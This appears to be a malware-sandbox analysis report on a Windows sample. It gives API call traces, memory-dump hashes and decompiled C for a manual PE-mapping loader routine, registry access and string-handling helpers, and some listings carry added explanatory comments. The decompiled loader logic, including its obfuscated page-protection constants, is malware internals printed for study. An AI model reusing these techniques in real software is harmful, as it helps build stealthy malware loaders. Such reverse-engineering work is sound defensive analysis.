                                                            0x6e4b1ff9
                                                            0x6e4b1ffd
                                                            0x6e4b1ffd
                                                            0x6e4b2007
                                                            0x6e4b2010

                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6E4B1FCC
                                                            • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E4B1FD7
                                                            • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E4B1FEA
                                                            • SetThreadPriority.KERNELBASE(00000000,00000000,?), ref: 6E4B1FFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Thread$Priority$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1452675757-0
                                                            • Opcode ID: 1dec30c0ea0fae77c6ccb024b6e6a78b2fb0e00f209847812bf30681e9bfbe88
                                                            • Instruction ID: e6eccbac5df728967c726e3ac836287631e9de076b3f9661f5ea8924fcbf0cfa
                                                            • Opcode Fuzzy Hash: 1dec30c0ea0fae77c6ccb024b6e6a78b2fb0e00f209847812bf30681e9bfbe88
                                                            • Instruction Fuzzy Hash: 87E09231609A116B97017ABE5C88F6B775CEF933307020636F520D23D4DBB49C1685B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,045681F3,69B25F44,?,?,00000000), ref: 04575A84
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,045681F3), ref: 04575AE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$FileFreeHeapSystem
                                                            • String ID: {l0u
                                                            • API String ID: 892271797-597588357
                                                            • Opcode ID: 1dc6e0810d9fccab0e6a6a9aa8a460a7fa22f5b76ed13d68f515d92d83020783
                                                            • Instruction ID: 95988ea233ae73e31d6ef33786c3ffb9225171c511e6b3441bcd9b3566a4caa5
                                                            • Opcode Fuzzy Hash: 1dc6e0810d9fccab0e6a6a9aa8a460a7fa22f5b76ed13d68f515d92d83020783
                                                            • Instruction Fuzzy Hash: F511FE7590120DFBDB11DBA4E984ADE77BCFB08305F100466A501F2550EB38AA48EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD14C4(void* __edx) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				WCHAR* _v16;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t23;
                                                            				intOrPtr _t24;
                                                            				void* _t26;
                                                            				intOrPtr _t32;
                                                            				intOrPtr _t35;
                                                            				void* _t37;
                                                            				intOrPtr _t38;
                                                            				intOrPtr _t42;
                                                            				void* _t45;
                                                            				void* _t50;
                                                            				void* _t52;
                                                            
                                                            				_t50 = __edx;
                                                            				_v12 = 0;
                                                            				_t23 = E00DD1FBC(0,  &_v8); // executed
                                                            				if(_t23 != 0) {
                                                            					_v8 = 0;
                                                            				}
                                                            				_t24 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t4 = _t24 + 0xddbd70; // 0x39c9318
                                                            				_t5 = _t24 + 0xddbd18; // 0x4f0053
                                                            				_t26 = E00DD6A1E( &_v16, _v8, _t5, _t4); // executed
                                                            				_t45 = _t26;
                                                            				if(_t45 == 0) {
                                                            					StrToIntExW(_v16, 0,  &_v12);
                                                            					_t45 = 8;
                                                            					if(_v12 < _t45) {
                                                            						_t45 = 1;
                                                            						__eflags = 1;
                                                            					} else {
                                                            						_t32 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t11 = _t32 + 0xddbd64; // 0x39c930c
                                                            						_t48 = _t11;
                                                            						_t12 = _t32 + 0xddbd18; // 0x4f0053
                                                            						_t52 = E00DD73AF(_t11, _t12, _t11);
                                                            						_t59 = _t52;
                                                            						if(_t52 != 0) {
                                                            							_t35 =  *0xdda2d4; // 0x2bed5a8
                                                            							_t13 = _t35 + 0xddbdae; // 0x30314549
                                                            							_t37 = E00DD3D26(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                            							if(_t37 == 0) {
                                                            								_t61 =  *0xdda2b4 - 6;
                                                            								if( *0xdda2b4 <= 6) {
                                                            									_t42 =  *0xdda2d4; // 0x2bed5a8
                                                            									_t15 = _t42 + 0xddbbba; // 0x52384549
                                                            									E00DD3D26(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                            								}
                                                            							}
                                                            							_t38 =  *0xdda2d4; // 0x2bed5a8
                                                            							_t17 = _t38 + 0xddbda8; // 0x39c9350
                                                            							_t18 = _t38 + 0xddbd80; // 0x680043
                                                            							_t45 = E00DD2A5C(_v8, 0x80000001, _t52, _t18, _t17);
                                                            							HeapFree( *0xdda290, 0, _t52);
                                                            						}
                                                            					}
                                                            					HeapFree( *0xdda290, 0, _v16);
                                                            				}
                                                            				_t54 = _v8;
                                                            				if(_v8 != 0) {
                                                            					E00DD44B9(_t54);
                                                            				}
                                                            				return _t45;
                                                            			}

                                                            0x00dd14c4
                                                            0x00dd14d4
                                                            0x00dd14d7
                                                            0x00dd14de
                                                            0x00dd14e0
                                                            0x00dd14e0
                                                            0x00dd14e3
                                                            0x00dd14e8
                                                            0x00dd14ef
                                                            0x00dd14fc
                                                            0x00dd1501
                                                            0x00dd1505
                                                            0x00dd1513
                                                            0x00dd1521
                                                            0x00dd1525
                                                            0x00dd15b6
                                                            0x00dd15b6
                                                            0x00dd152b
                                                            0x00dd152b
                                                            0x00dd1530
                                                            0x00dd1530
                                                            0x00dd1537
                                                            0x00dd1543
                                                            0x00dd1545
                                                            0x00dd1547
                                                            0x00dd1549
                                                            0x00dd1550
                                                            0x00dd155b
                                                            0x00dd1562
                                                            0x00dd1564
                                                            0x00dd156b
                                                            0x00dd156d
                                                            0x00dd1574
                                                            0x00dd157f
                                                            0x00dd157f
                                                            0x00dd156b
                                                            0x00dd1584
                                                            0x00dd1589
                                                            0x00dd1590
                                                            0x00dd15ae
                                                            0x00dd15b0
                                                            0x00dd15b0
                                                            0x00dd1547
                                                            0x00dd15c2
                                                            0x00dd15c2
                                                            0x00dd15c4
                                                            0x00dd15c9
                                                            0x00dd15cb
                                                            0x00dd15cb
                                                            0x00dd15d6

                                                            APIs
                                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,039C9318,00000000,?,73BCF710,00000000,73BCF730), ref: 00DD1513
                                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,039C9350,?,00000000,30314549,00000014,004F0053,039C930C), ref: 00DD15B0
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DD6DBE), ref: 00DD15C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 11e03142826da3e83949dcf846dc4f8c574b618e6b33f00566b8fb7d80a41f2b
                                                            • Instruction ID: f13eb414b9ac3d12c3d00568942cd8d5e52e5ecbd449d17e7e16d3b96ef3683e
                                                            • Opcode Fuzzy Hash: 11e03142826da3e83949dcf846dc4f8c574b618e6b33f00566b8fb7d80a41f2b
                                                            • Instruction Fuzzy Hash: D531CF35901209FFCB21DB94ED84EAA7BB9EB44704F150097B505A7262D772AA04DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E00DD2FE6(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                            				void* _v8;
                                                            				char _v48;
                                                            				void* __edi;
                                                            				intOrPtr _t22;
                                                            				long _t29;
                                                            				intOrPtr _t33;
                                                            				intOrPtr* _t41;
                                                            				void* _t42;
                                                            				void* _t46;
                                                            				intOrPtr* _t47;
                                                            				void* _t48;
                                                            				intOrPtr _t50;
                                                            
                                                            				_t46 = __edx;
                                                            				_t42 = __ecx;
                                                            				_t41 = _a16;
                                                            				_t47 = __eax;
                                                            				_t22 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t2 = _t22 + 0xddb671; // 0x657a6973
                                                            				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                                            				if( *0xdda2a4 >= 5) {
                                                            					_push( &_a16);
                                                            					_push( &_v8);
                                                            					_push( &_v48);
                                                            					_t29 = _a4;
                                                            					"QQSUVWh"();
					L5:
					_a4 = _t29;                                    // E00DD323C's result doubles as the return code
					L6:
					if(_a4 != 0) {
						L9:
						 *0xdda2a4 =  *0xdda2a4 + 1;               // global failure counter
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;                                    // the 0x800-byte buffer allocated below
					 *_t41 = E00DD1D41(_t49, _t48); // executed
					_t33 = E00DD3AFD(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;                              // out: buffer
						 *_a12 = _t33;                             // out: E00DD3AFD result
						if( *0xdda2a4 < 5) {
							 *0xdda2a4 =  *0xdda2a4 & 0x00000000;  // reset the counter on success, unless it has already reached 5
						}
						goto L10;
					}
					_a4 = 0xbf;                                    // E00DD3AFD failed
					E00DD454A();
					HeapFree( *0xdda290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xdda390; // 0x39c8d6c
				if(RtlAllocateHeap( *0xdda290, 0, 0x800) == 0) {  // 0x800-byte work buffer (reaches _v8 / _t48)
					_a4 = 8;                                       // 8 == ERROR_NOT_ENOUGH_MEMORY, the same code E00DD4730 returns on allocation failure
					goto L6;
				}
				_t29 = E00DD323C(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // formats the buffer with GetTickCount and six wsprintfA calls (see subcall APIs below)
				goto L5;
			}

Instruction addresses of the listing above (per-line address gutter, not reproduced): 0x00dd2fe6 - 0x00dd30d0

                                                            APIs
                                                            • wsprintfA.USER32 ref: 00DD3008
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DD302D
                                                              • Part of subcall function 00DD323C: GetTickCount.KERNEL32 ref: 00DD3253
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32A0
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32BD
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32DD
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32FB
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD331E
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD333F
                                                            • HeapFree.KERNEL32(00000000,00DD6E08,?,?,00DD6E08,?), ref: 00DD30A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                            • String ID:
                                                            • API String ID: 2794511967-0
                                                            • Opcode ID: ce59c0e674ac7b29b331bd4ec5d75a17a6a9b9013fc8abadd983e8a5befd5002
                                                            • Instruction ID: e6cd90fc062bb3e7e48a707739f10b2d0fe4ac6792d2c5d5af1aca10bb3d7398
                                                            • Opcode Fuzzy Hash: ce59c0e674ac7b29b331bd4ec5d75a17a6a9b9013fc8abadd983e8a5befd5002
                                                            • Instruction Fuzzy Hash: E3310776501209EBCB11DF69D984AAA7BBCFB08350F108017F906EB351D735EA148BB6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RegQueryValueExA.KERNELBASE(045681F8,00000000,00000000,?,0458B06C,?,00000001,045681F8,00000001,00000000,73B74D40,?,?,?,00000000,045681F8), ref: 04569A73
                                                            • RegSetValueExA.KERNELBASE(045681F8,00000000,00000000,00000003,0458B06C,00000028,?,?,?,00000000,045681F8), ref: 04569AB2
                                                            • RegCloseKey.ADVAPI32(045681F8,?,?,?,00000000,045681F8), ref: 04569ABE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$CloseCreateQuerylstrlen
                                                            • String ID:
                                                            • API String ID: 2552977122-0
                                                            • Opcode ID: 6c694a6916667667a2353e1c3a20071c208116af1e975b846e0afe5cc096ad38
                                                            • Instruction ID: 9f44d772a9553612503b30e11e8986e49b1d95d76f571ad8bd76e1e3c5666654
                                                            • Opcode Fuzzy Hash: 6c694a6916667667a2353e1c3a20071c208116af1e975b846e0afe5cc096ad38
                                                            • Instruction Fuzzy Hash: 25313871900219EFDB21DF95E8849AEBBBCFB44750B00516EF511B3250DB746E48EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0456AB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 0456ABBE
                                                              • Part of subcall function 0456AB88: lstrcpy.KERNEL32(00000000,00000000), ref: 0456ABE2
                                                              • Part of subcall function 0456AB88: lstrcat.KERNEL32(00000000,00000000), ref: 0456ABEA
                                                            • RegOpenKeyExA.KERNELBASE(0457AB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0457AB63,80000001,?,045722F6), ref: 0457ABC2
                                                            • RegOpenKeyExA.ADVAPI32(0457AB63,0457AB63,00000000,00020019,80000001,?,0457AB63,80000001,?,045722F6), ref: 0457ABD8
                                                            • RegCloseKey.ADVAPI32(80000001,80000001,?,045722F6,04572306,?,0457AB63,80000001,?,045722F6), ref: 0457AC21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 4131162436-0
                                                            • Opcode ID: 188433d74529d592c631dc0714c4a5d0f88521f6d09e7ceb55719b4a88c7f2ad
                                                            • Instruction ID: 930acc59df8081893126cd6fce4adce3d738d0766bc24ba25123bfa60f9609cf
                                                            • Opcode Fuzzy Hash: 188433d74529d592c631dc0714c4a5d0f88521f6d09e7ceb55719b4a88c7f2ad
                                                            • Instruction Fuzzy Hash: 9A210E75A00109BFDB01DF95EC81CAEBBBDFB85214B144079F904A3111E735AE59AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
			E00DD4730(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				// Replace the first occurrence of needle _a8 in the buffer _a4 (length in
				// eax) with the buffer _a12 (length _a16), into a fresh heap block.
				// Out: *_a20 = new buffer, *_a24 = new length. Returns 0 on success,
				// 8 (ERROR_NOT_ENOUGH_MEMORY) if RtlAllocateHeap fails, 0xb if there is no match.
				// E00DD7801 is called as (size, src, dst) and returns the end of dst, i.e. memcpy-like.
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;                                  // haystack length
				_v12 = 0xb;                                    // default result: no match
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);                      // last byte of the haystack ...
					_t28 =  *_t46;
					_v5 = _t28;                                // ... is saved and
					 *_t46 = 0;                                // overwritten with NUL so StrStrA stops there (the last byte is never part of a match)
					__imp__(_a8, _t45);                        // lstrlen(_a8): needle length
					_v16 = _t28;                               // decompiler artifact: _v16 holds the lstrlen result, not the saved byte (see its use below)
					_t57 = StrStrA(_t56, _a8);                 // first match, or NULL
					if(_t57 != 0) {
						 *_t46 = _v5;                          // restore the byte (note: not restored on the no-match path)
						_t33 = RtlAllocateHeap( *0xdda290, 0, _a16 + _t60); // executed; replacement length + haystack length
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;                          // allocation failed
						} else {
							_t58 = _t57 - _a4;                 // offset of the match
							E00DD7801(_t57 - _a4, _a4, _t48);                  // copy the bytes before the match
							_t38 = E00DD7801(_a16, _a12, _t58 + _t48);         // copy the replacement
							_t53 = _v16;
							_t59 = _a16;
							E00DD7801(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59); // copy the tail that follows the needle
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;          // success
							 *_a24 = _t60 - _v16 + _t59;       // new length = old length - needle length + replacement length
						}
					}
				}
				return _v12;
			}

Instruction addresses of the listing above (per-line address gutter, not reproduced): 0x00dd4738 - 0x00dd47f7

                                                            APIs
                                                            • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00DD4764
                                                            • StrStrA.SHLWAPI(00000000,?), ref: 00DD4771
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DD4790
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 556738718-0
                                                            • Opcode ID: 334584317534b6983858e41fb2a993895f97223da9cff61f697cdb383f7df402
                                                            • Instruction ID: 105988a9e5d39e2691c4f0142e16ad3767797dc5e53b7c124ecd99232b90e223
                                                            • Opcode Fuzzy Hash: 334584317534b6983858e41fb2a993895f97223da9cff61f697cdb383f7df402
                                                            • Instruction Fuzzy Hash: 58213936A00249AFCB129F68D884B9EBBB5EF85314F088156EC04AB315D731E919CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
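E00DD4730 above is a bounded replace-first-occurrence: locate needle _a8 in the (_a4, length in eax) buffer, allocate old length + replacement length, and copy prefix, replacement and tail into the new block. The C below is an added example written for this report, not code from the sample: it reproduces that behaviour with plain libc (malloc and memcpy stand in for RtlAllocateHeap and E00DD7801), keeps the sample's return codes 0x0b and 0x08, and keeps the search-window quirk in which the last byte of the haystack and anything after an embedded NUL are never part of the match. The function and error-code names are ours, and the HTTP request in main() is a constructed input.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define ERR_NO_MATCH 0x0b   /* E00DD4730's default result (_v12 = 0xb) */
#define ERR_NO_MEM   0x08   /* returned when RtlAllocateHeap fails */

/* Replace the first occurrence of `needle` in hay[0..len) with repl[0..repl_len).
 * On success returns 0 and hands back a malloc'd buffer in *out with its length
 * in *out_len (caller frees). The search mirrors the sample: StrStrA only ever
 * sees hay[0..len-1) because the sample writes a temporary NUL at hay[len-1],
 * and it stops at any embedded NUL. The input is never modified here. */
int replace_first(const uint8_t *hay, size_t len, const char *needle,
                  const uint8_t *repl, size_t repl_len,
                  uint8_t **out, size_t *out_len)
{
    if (hay == NULL || len == 0)
        return ERR_NO_MATCH;
    size_t nlen = strlen(needle);                       /* lstrlen(_a8) */
    size_t window = len - 1;                            /* byte len-1 is the temporary NUL */
    const uint8_t *nul = memchr(hay, 0, window);        /* StrStrA stops at an embedded NUL */
    if (nul != NULL)
        window = (size_t)(nul - hay);
    const uint8_t *hit = NULL;                          /* StrStrA(_t56, _a8) */
    for (size_t i = 0; i + nlen <= window; i++) {
        if (memcmp(hay + i, needle, nlen) == 0) { hit = hay + i; break; }
    }
    if (hit == NULL)
        return ERR_NO_MATCH;

    size_t prefix = (size_t)(hit - hay);                /* _t58: offset of the match */
    size_t total  = len - nlen + repl_len;              /* *_a24 = _t60 - _v16 + _a16 */
    uint8_t *buf = malloc(len + repl_len);              /* RtlAllocateHeap(_a16 + _t60); total <= len + repl_len */
    if (buf == NULL)
        return ERR_NO_MEM;
    memcpy(buf, hay, prefix);                                                   /* bytes before the match */
    memcpy(buf + prefix, repl, repl_len);                                       /* the replacement */
    memcpy(buf + prefix + repl_len, hay + prefix + nlen, len - prefix - nlen);  /* tail after the needle */
    *out = buf;
    *out_len = total;
    return 0;
}

/* Stand-alone demo on a constructed HTTP request fragment. */
int main(void)
{
    const char *req = "GET / HTTP/1.1\r\nAccept-Encoding: gzip, deflate\r\n\r\n";
    uint8_t *out = NULL;
    size_t out_len = 0;
    int rc = replace_first((const uint8_t *)req, strlen(req), "gzip, deflate",
                           (const uint8_t *)"identity", 8, &out, &out_len);
    if (rc != 0) {
        printf("replace failed: 0x%02x\n", rc);
        return 1;
    }
    fwrite(out, 1, out_len, stdout);
    free(out);
    return 0;
}
```

Two details of the original are worth keeping in mind when reading memory dumps of this sample: the temporary NUL at hay[len-1] is only put back when StrStrA finds a match, so a haystack that produced no match is left truncated by one byte, and the allocation is one needle length larger than the data it receives.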

                                                            C-Code - Quality: 87%
			E6E4B1D96(void* __eax, void* _a4) {
				// __eax: IMAGE_NT_HEADERS of the image being mapped, _a4: its base address.
				// Applies page protections to the headers and to every section, the final
				// step of a manual PE mapper before the image is used. No PAGE_* literal
				// appears: each protection is computed as (*0x6e4b41cc - immediate). The key
				// must be 0x69b25f44 for the section stride below (0x7c211d88 + key * 0x28)
				// to wrap to sizeof(IMAGE_SECTION_HEADER) == 0x28, and the same value shows
				// up in the lstrlen argument trace at 0456ABBE; with it the four immediates
				// give PAGE_READWRITE (0x04), PAGE_READONLY (0x02), PAGE_EXECUTE_READ (0x20)
				// and PAGE_EXECUTE_READWRITE (0x40).
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;                                // last error, 0 = success
				_t57 =  *0x6e4b41cc;                                     // obfuscation key
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;   // &OptionalHeader + FileHeader.SizeOfOptionalHeader = first IMAGE_SECTION_HEADER
				_v16 =  *(__eax + 6) & 0x0000ffff;                       // FileHeader.NumberOfSections
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed; headers: OptionalHeader.SizeOfHeaders bytes, PAGE_READWRITE
				_v8 = _v8 & 0x00000000;                                  // section index
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;                                        // stop at the first VirtualProtect failure
					}
					asm("bt [esi+0x24], eax");                           // test a bit of IMAGE_SECTION_HEADER.Characteristics (IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE)
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;                    // PAGE_READWRITE
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed; base + VirtualAddress, VirtualSize bytes
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;      // == _t58 + 0x28: next section header
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;                        // PAGE_READONLY
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;                        // PAGE_EXECUTE_READ
					} else {
						_t54 = _t57 - 0x69b25f04;                        // PAGE_EXECUTE_READWRITE
					}
					goto L9;
				}
				goto L12;
			}

Instruction addresses of the listing above (per-line address gutter, not reproduced): 0x6e4b1da0 - 0x6e4b1e75

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E4B1DCF
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E4B1E44
                                                            • GetLastError.KERNEL32 ref: 6E4B1E4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
• Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1469625949-0
                                                            • Opcode ID: cff6f41ea3f4d3cd878fdc4b49ffbae98c0218687cff261b1dc075e4af899348
                                                            • Instruction ID: 25c6de240e40b7917dd9a4870d758d98597a775ed286819e6bd090a252bcf379
                                                            • Opcode Fuzzy Hash: cff6f41ea3f4d3cd878fdc4b49ffbae98c0218687cff261b1dc075e4af899348
                                                            • Instruction Fuzzy Hash: AA21417190020ADFCB14DFE5C885EAAF7B4FF08345F41445AD106D7249E7B4BA69CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E6E4B1CDB() {
                                                            				char _v28;
                                                            				void _v44;
                                                            				char _v48;
                                                            				void* _v52;
                                                            				long _t23;
                                                            				int _t24;
                                                            				void* _t28;
                                                            				intOrPtr* _t30;
                                                            				signed int _t34;
                                                            				intOrPtr _t36;
                                                            
                                                            				_push(0);
                                                            				_push(0x6e4b41c4);
                                                            				_push(1);
                                                            				_push( *0x6e4b41d0 + 0x6e4b5089);
                                                            				 *0x6e4b41c0 = 0xc;
                                                            				 *0x6e4b41c8 = 0; // executed
                                                            				L6E4B1262(); // executed
                                                            				_t34 = 6;
                                                            				memset( &_v44, 0, _t34 << 2);
                                                            				if(E6E4B1344( &_v44,  &_v28,  *0x6e4b41cc ^ 0xf7a71548) == 0) {
                                                            					_t23 = 0xb;
                                                            					L7:
                                                            					ExitThread(_t23);
                                                            				}
                                                            				_t24 = lstrlenW( *0x6e4b41b8);
                                                            				_t7 = _t24 + 2; // 0x2
                                                            				_t10 = _t24 + _t7 + 8; // 0xa
                                                            				_t28 = E6E4B109B(_t36, _t10,  &_v48,  &_v52); // executed
                                                            				if(_t28 == 0) {
                                                            					_t30 = _v52;
                                                            					 *_t30 = 0;
                                                            					if( *0x6e4b41b8 == 0) {
                                                            						 *((short*)(_t30 + 4)) = 0;
                                                            					} else {
                                                            						E6E4B212C(_t40, _t30 + 4);
                                                            					}
                                                            				}
                                                            				_t23 = E6E4B1B55(_v44); // executed
                                                            				goto L7;
                                                            			}

                                                            0x6e4b1ced
                                                            0x6e4b1cee
                                                            0x6e4b1cf3
                                                            0x6e4b1cfb
                                                            0x6e4b1cfc
                                                            0x6e4b1d06
                                                            0x6e4b1d0c
                                                            0x6e4b1d15
                                                            0x6e4b1d1a
                                                            0x6e4b1d38
                                                            0x6e4b1d8d
                                                            0x6e4b1d8e
                                                            0x6e4b1d8f
                                                            0x6e4b1d8f
                                                            0x6e4b1d40
                                                            0x6e4b1d46
                                                            0x6e4b1d54
                                                            0x6e4b1d58
                                                            0x6e4b1d5f
                                                            0x6e4b1d67
                                                            0x6e4b1d6b
                                                            0x6e4b1d6d
                                                            0x6e4b1d7c
                                                            0x6e4b1d6f
                                                            0x6e4b1d75
                                                            0x6e4b1d75
                                                            0x6e4b1d6d
                                                            0x6e4b1d84
                                                            0x00000000

                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E4B41C4,00000000), ref: 6E4B1D0C
                                                            • lstrlenW.KERNEL32(?,?,?), ref: 6E4B1D40
                                                              • Part of subcall function 6E4B109B: GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E4B10A8
